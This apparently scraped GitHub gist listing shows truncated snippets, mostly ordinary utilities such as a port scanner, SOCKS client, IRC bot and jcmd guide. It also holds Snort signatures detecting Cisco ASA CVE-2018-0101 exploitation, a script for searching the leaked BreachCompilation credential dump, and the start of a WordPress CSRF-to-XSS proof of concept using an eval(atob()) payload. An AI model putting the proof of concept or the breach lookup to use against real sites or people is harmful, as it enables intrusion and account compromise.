51pwn hktalent

☕️0dat RCE for everything's
@fox-srt
fox-srt / CVE-2018-0101.rules
Last active April 10, 2018 09:42
Cisco ASA RCE / CVE-2018-0101 IDS Signatures
# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:
alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02|"; distance:1; within:1; fast_pattern; byte_test:4,>,5000,5,relative; byte_test:2,>,5000,11,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,53,relative; byte_test:4,=,fragment_match,137,relative; byte_test:4,=,fragment_match,237,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:5;)
alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)
@gkbrk
gkbrk / scanner.py
Created March 10, 2015 21:11
Simple port scanner in Python.
import socket
import sys
import threading
import queue
import time
common_ports = {
"21": "FTP",
"22": "SSH",
"23": "Telnet",
@unkaktus
unkaktus / grill-tor-2016-12-08
Last active August 8, 2018 00:34
Tor grill scan results
@poisa
poisa / query.sh
Created December 18, 2017 22:25
Query script for the BreachCompilation updated to work in OSX
#!/bin/bash
# Uses BASH_SOURCE and [[ ]], so it needs bash rather than a POSIX /bin/sh.
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
if [ "$1" != "" ]; then
    letter1=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b1)
    if [[ $letter1 == [a-zA-Z0-9] ]]; then
        if [ -f "$dir/data/$letter1" ]; then
            grep -ai "^$1" "$dir/data/$letter1"
        else
            letter2=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b2)
@adammw
adammw / socks.js
Created February 14, 2012 16:21
Socks library snippet for Node.js
var net = require('net'),
    util = require('util'),
    EventEmitter = require('events').EventEmitter;
var SOCKSClient = module.exports = function() {
    var args = normalizeConnectArgs(arguments);
    this.state = 'connecting';
    this.socket = net.connect(args[0].port, args[0].host, onConnect.bind(this));
    this.socket.on('data', onData.bind(this));
    this.socket.on('end', onEnd.bind(this));
@allyshka
allyshka / csrf.html
Last active April 28, 2019 05:57
Wordpress <=5.1 PoC Akismet plugin index.php edit through CSRF
<html>
<body>
<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
<input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;
@chrisforbes
chrisforbes / bot.py
Created August 29, 2011 03:44
Really simple IRC bot using Twisted
#!/usr/bin/env python2
"""A really simple IRC bot."""
import sys
from twisted.internet import reactor, protocol
from twisted.words.protocols import irc
class Bot(irc.IRCClient):
    def _get_nickname(self):
@noahlz
noahlz / troubleshooting-with-jcmd.md
Last active May 31, 2019 13:47
Troubleshooting Production JVMs with jcmd
jcmd is a powerful new tool introduced in Java 7. Along with jstack and jps, it should be in your go-to toolkit for solving production problems on the JVM. (Come to think of it, with this tool you don't really need jps anymore.)

Here's an example session with jcmd:

$ ssh wopr.qa.corp.local
$ jcmd -l
34739 sun.tools.jcmd.JCmd -l
@spicycode
spicycode / GIF-Screencast-OSX.md
Last active June 10, 2019 21:16 — forked from dergachev/GIF-Screencast-OSX.md
OS X Screencast to animated GIF
This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

@XueshiQiao
XueshiQiao / gource.sh
Last active November 10, 2019 15:56 — forked from cgoldberg/gource.sh
Generate a MP4 Video for your Git project commits using Gource!
# 1. install gource using Homebrew
brew install gource
# 2. install avconv (shipped with libav)
git clone git://git.libav.org/libav.git
cd libav
# it will take 3-5 minutes to compile, be patient.
./configure --disable-yasm
make && make install